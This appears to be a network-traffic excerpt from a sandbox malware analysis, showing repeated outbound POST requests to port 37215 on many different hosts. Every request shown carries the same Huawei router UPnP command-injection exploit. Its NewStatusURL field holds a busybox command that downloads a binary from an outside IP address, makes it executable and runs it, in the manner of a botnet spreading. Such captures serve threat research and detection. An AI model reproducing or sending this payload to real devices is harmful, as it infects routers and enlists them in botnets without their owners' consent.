                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2165192.168.2.155547441.110.62.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671168089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2166192.168.2.154421841.177.187.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671195984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2167192.168.2.155645641.252.228.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671212912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2168192.168.2.154607041.132.144.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671220064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2169192.168.2.154720241.60.167.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671267033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2170192.168.2.154842041.113.38.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671267033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2171192.168.2.154087441.84.199.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671268940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2172192.168.2.154856441.119.160.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671279907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2173192.168.2.155593241.3.52.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671338081 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2174192.168.2.155756641.42.250.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671340942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
